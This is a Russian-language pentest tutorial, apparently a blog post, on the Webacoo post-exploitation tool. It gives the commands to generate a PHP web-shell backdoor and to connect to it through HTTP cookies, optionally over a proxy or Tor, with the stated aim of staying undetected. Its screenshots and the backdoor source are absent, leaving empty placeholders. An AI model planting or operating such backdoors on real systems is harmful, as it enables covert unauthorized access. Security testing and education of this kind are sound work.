Добрый день, уважаемый читатель!

Сегодня мы поговорим об инструменте этапа постэксплуатации – одного из этапов проведения пентестов. Как ты понимаешь, этап постэксплуатации очень важен тем, что мы проникли на целевую машину и наша задача выиграть для себя как можно больше времени, чтобы осмотреться и продолжить атаку на следующие элементы сети и при этом как можно дольше оставаться незамеченным.

Инструмент Webacoo интересен тем, что позволяет организовать backdoor на целевой машине посредством механизма http cookie.

Webacoo по умолчанию включен в KaliLinux. Для остальных систем необходимо сначала установить:

• perl installed
• liburi-perl
• libio-socket-socks-perl

Сам проект доступен по адресу: https://github.com/anestisb/WeBaCoo.

Также доступен модуль для использования в Metasploit: https://github.com/anestisb/WeBaCoo/blob/master/msf_webacoo_module.rb.

Работа с инструментом состоит из двух этапов.

Этап 1. Создание backdoor.

webacoo -g -f 1 -o /tmp/backdoor.php

Описание опций:

-g – указывает на создание backdoor
-f – выбирает системную функцию для исполнения команд

1. system (default)
2. shell_exec
3. exec
4. passthru
5. popen

-o – задает имя генерируемого файла

Генерация backdoor:

Исходник полученного backdoor:

Этап 2. Использование backdoor.

Сначала закидываем backdoor на целевую машину, к которой у нас есть доступ и работаем с командной строкой через интерфейс webacoo.

webacoo -t -u http://url/bacdoor.php -c M_cookie -p PROXY

Описание опций:

-t – устанавливает удаленное соединение
-u – адрес backdoor
-c – задает переменную cookie
-p – использует соединение через proxy, в том числе имеется возможность использовать tor сеть.

Получаем shell на целевой машине с помощью нашего backdoor.php:

Проверяем исполнение команд на удаленной машине:

А вот так выглядят наши логи, генерируемые при использовании backdoor.php:

Как видим, механизм достаточно простой и предоставляет удобный и быстрый инструмент для дальнейших выполнений пентестов.

На этом, пока все!

Хорошего дня и успешных пентестов!